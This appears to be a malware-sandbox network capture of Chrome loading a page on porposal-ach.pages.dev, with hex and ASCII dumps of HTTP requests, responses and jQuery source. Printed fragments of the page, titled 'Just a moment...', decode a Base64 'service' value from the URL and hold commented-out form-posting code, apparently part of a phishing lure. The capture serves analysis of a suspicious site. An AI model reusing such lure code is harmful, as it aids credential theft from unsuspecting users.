                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 3b 69 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 65 29 2c 72 3d 30 3b 77 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61
                                                                                                                                                                                                                                      Data Ascii: ((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTa
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6c 65 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 3d 54 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 65 29 3f 2d 31 3a 74 3d 3d 3d 54 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 79 65 26 26 49 2e 63 6f 6e 74 61 69 6e 73 28 79 65 2c 74 29 3f 31 3a 6f 3f 73 65 2e 63 61 6c 6c 28 6f 2c 65 29 2d 73 65 2e 63 61 6c 6c 28 6f 2c 74 29 3a 30 3a 34 26
                                                                                                                                                                                                                                      Data Ascii: =(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!le.sortDetached&&t.compareDocumentPosition(e)===n?e===T||e.ownerDocument==ye&&I.contains(ye,e)?-1:t===T||t.ownerDocument==ye&&I.contains(ye,t)?1:o?se.call(o,e)-se.call(o,t):0:4&
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1378INData Raw: 72 3a 7b 41 54 54 52 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 65 5b 33 5d 3d 28 65 5b 33 5d 7c 7c 65 5b 34 5d 7c 7c 65 5b 35 5d 7c 7c 22 22 29 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 2c 22 7e 3d 22 3d 3d 3d 65 5b 32 5d 26 26 28 65 5b 33 5d 3d 22 20 22 2b 65 5b 33 5d 2b 22 20 22 29 2c 65 2e 73 6c 69 63 65 28 30 2c 34 29 7d 2c 43 48 49 4c 44 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 31 5d 3d 65 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 6e 74 68 22 3d 3d 3d 65 5b 31 5d 2e 73 6c 69 63 65 28 30 2c 33 29 3f 28 65 5b 33 5d 7c 7c 49 2e 65 72 72 6f 72 28 65 5b 30 5d 29 2c 65 5b 34 5d 3d 2b 28 65 5b 34 5d 3f 65 5b 35 5d 2b 28 65 5b 36 5d 7c
                                                                                                                                                                                                                                      Data Ascii: r:{ATTR:function(e){return e[1]=e[1].replace(O,P),e[3]=(e[3]||e[4]||e[5]||"").replace(O,P),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||I.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]|


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.1649718172.66.47.744436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC600OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: porposal-ach.pages.dev
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://porposal-ach.pages.dev/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC941INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BAMvDiLX4j2hE9pGJiM591pX7Wqy%2BnMPC%2FYaCRS1vnjle1NJ5JUN%2FahzeqH3bMttJoI6R1Ec0x16yMmzspD6CsWaAVoilGrA886grrBSN%2BU6gINhZoJyCYH0iLkBNLrcVyevT3YuCG7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd3b180b42c4-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=13148&min_rtt=1782&rtt_var=7561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1178&delivery_rate=1638608&cwnd=211&unsent_bytes=0&cid=7d05a0e733c074e2&ts=1200&x=0"
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC428INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                                                                                                                                                                                                      Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1369INData Raw: 69 74 28 22 23 22 29 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 68 61 73 68 32 5b 31 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 68 61 73 68 56 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6e 61 6d 65 20 3d 20 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 27 73 65 72 76 69 63 65 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 44 65 63 6f 64 65 20 74 68 65 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 76 61 6c 75 65 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 56 61 6c 75 65 20 3d 20 61 74 6f 62 28 6e 61 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f
                                                                                                                                                                                                                                      Data Ascii: it("#")[1]; // console.log(hash2[1]); const urlParams = new URLSearchParams(hashValue); const name = urlParams.get('service'); // Decode the Base64-encoded value var decodedValue = atob(name); co
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC1369INData Raw: 4a 74 59 57 4d 69 4f 69 4a 69 4d 44 64 6b 4f 54 6c 6d 4d 6d 56 6c 4e 54 46 6a 5a 6a 45 34 59 6a 4a 6d 5a 57 4e 6d 4e 6a 63 77 4d 6a 6c 69 4d 6a 67 32 5a 6d 59 7a 5a 54 64 6d 4d 7a 45 30 5a 57 46 68 4f 44 63 7a 5a 6a 64 69 5a 54 67 32 4f 44 52 6a 5a 6a 45 34 4e 32 52 68 4f 54 55 32 49 6e 30 25 33 44 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 70 72 6f 63 65 73 73 44 61 74 61 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 6d 69 6d 65 54 79 70 65 3a 20 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 63 6f 6e 74 65 6e 74 54 79 70 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 64 61 74 61 3a 20 66 6f 72 6d 2c
                                                                                                                                                                                                                                      Data Ascii: JtYWMiOiJiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D", // }, // processData: false, // mimeType: "multipart/form-data", // contentType: false, // data: form,
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC371INData Raw: 6f 75 72 20 73 75 70 70 6f 72 74 20 21 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 2e 73 74 61 74 75 73 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6a 61 76 61 73 63 72 69 70 74 43 61 6c 6c 62 61 63 6b 28 29 0a 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 44 45 57 45
                                                                                                                                                                                                                                      Data Ascii: our support ! "; } console.log(error.status); }); } setTimeout(() => { javascriptCallback() }, 1000); // }); </script> ... END DEWE
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.1649724151.101.130.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC358OUTGET /jquery-3.7.1.min.js HTTP/1.1
                                                                                                                                                                                                                                      Host: code.jquery.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 87533
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                      ETag: "28feccc0-155ed"
                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:27 GMT
                                                                                                                                                                                                                                      Age: 1331134
                                                                                                                                                                                                                                      X-Served-By: cache-lga21978-LGA, cache-ewr-kewr1740076-EWR
                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                      X-Cache-Hits: 1516, 4
                                                                                                                                                                                                                                      X-Timer: S1736272348.817178,VS0,VE0
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                      Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC16384INData Raw: 5d 7d 29 2c 6c 61 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 74 2d 31 5d 7d 29 2c 65 71 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 5b 6e 3c 30 3f 6e 2b 74 3a 6e 5d 7d 29 2c 65 76 65 6e 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 6e 3c 30 3f 6e 2b 74 3a 74 3c 6e 3f 74 3a 6e 3b 30
                                                                                                                                                                                                                                      Data Ascii: ]}),last:X(function(e,t){return[t-1]}),eq:X(function(e,t,n){return[n<0?n+t:n]}),even:X(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:X(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:X(function(e,t,n){var r;for(r=n<0?n+t:t<n?t:n;0
                                                                                                                                                                                                                                      2025-01-07 17:52:27 UTC16384INData Raw: 74 68 69 73 2c 74 2c 6e 29 3b 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 74 68 69 73 2c 74 29 2c 22 66 78 22 3d 3d 3d 74 26 26 22 69 6e 70 72 6f 67 72 65 73 73 22 21 3d 3d 65 5b 30 5d 26 26 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 74 29 7d 29 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 65 29 7d 29 7d 2c 63 6c 65 61 72 51 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 75 65 75 65 28 65 7c 7c 22 66 78 22 2c 5b 5d 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 31 2c 69 3d 63 65 2e 44 65 66 65 72 72 65 64
                                                                                                                                                                                                                                      Data Ascii: this,t,n);ce._queueHooks(this,t),"fx"===t&&"inprogress"!==e[0]&&ce.dequeue(this,t)})},dequeue:function(e){return this.each(function(){ce.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=ce.Deferred
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC16384INData Raw: 29 7b 63 65 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 63 65 28 65 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3d 30 3b 6f 3c 3d 69 3b 6f 2b 2b 29 74 3d 6f 3d 3d 3d 69 3f 74 68 69 73 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 21 30 29 2c 63 65 28 72 5b 6f 5d 29 5b 61 5d 28 74 29 2c 73 2e 61 70 70 6c 79 28 6e 2c 74 2e 67 65 74 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 29 7d 7d 29 3b 76 61 72 20 5f 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 47 2b 22 29 28 3f 21 70 78 29 5b 61 2d 7a 25 5d 2b 24 22 2c 22 69 22 29 2c 7a 65 3d 2f 5e 2d 2d 2f 2c 58 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                      Data Ascii: ){ce.fn[e]=function(e){for(var t,n=[],r=ce(e),i=r.length-1,o=0;o<=i;o++)t=o===i?this:this.clone(!0),ce(r[o])[a](t),s.apply(n,t.get());return this.pushStack(n)}});var _e=new RegExp("^("+G+")(?!px)[a-z%]+$","i"),ze=/^--/,Xe=function(e){var t=e.ownerDocument
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC16384INData Raw: 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73 73 4e 61 6d 65 22 7d 7d 29 2c 6c 65 2e 6f 70 74 53 65 6c 65 63 74 65 64 7c 7c 28 63 65 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                      Data Ascii: opFix:{"for":"htmlFor","class":"className"}}),le.optSelected||(ce.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parent
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC5613INData Raw: 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 72 3d 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 76 28 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 28 29 3a 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 2c 61 3f 65 5b 61 5d 3d 65 5b 61 5d 2e 72 65 70 6c 61 63 65 28 5a 74 2c 22 24 31 22 2b 72 29 3a 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 65 2e 75 72 6c 2b 3d 28 41 74 2e 74 65 73 74 28 65 2e 75 72 6c 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2e 6a 73 6f 6e 70 2b 22 3d 22 2b 72 29 2c 65 2e 63 6f 6e 76 65 72 74 65 72 73 5b 22 73 63 72 69 70 74 20 6a 73 6f 6e 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 63 65 2e 65 72 72 6f 72 28 72 2b 22 20 77 61 73 20 6e 6f 74 20 63
                                                                                                                                                                                                                                      Data Ascii: dataTypes[0])return r=e.jsonpCallback=v(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Zt,"$1"+r):!1!==e.jsonp&&(e.url+=(At.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o||ce.error(r+" was not c


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.1649727172.66.47.744436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC357OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: porposal-ach.pages.dev
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:28 UTC937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqNnY7h6j%2FDDyetexAGTi4RfehyqSUwxW4LXJUYR%2F2FKQThl3VVeW7E%2FWAIc2vshGRwvQ9Qr%2FWM5SaTUOaFtumo8BM2rrvPfQaYG2DwQjKNDvVBKiDW0M8F4nFKDfMPcEiKdop0KwCg%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd424d564237-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1838&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=935&delivery_rate=1588683&cwnd=194&unsent_bytes=0&cid=d5eea651169193b9&ts=179&x=0"
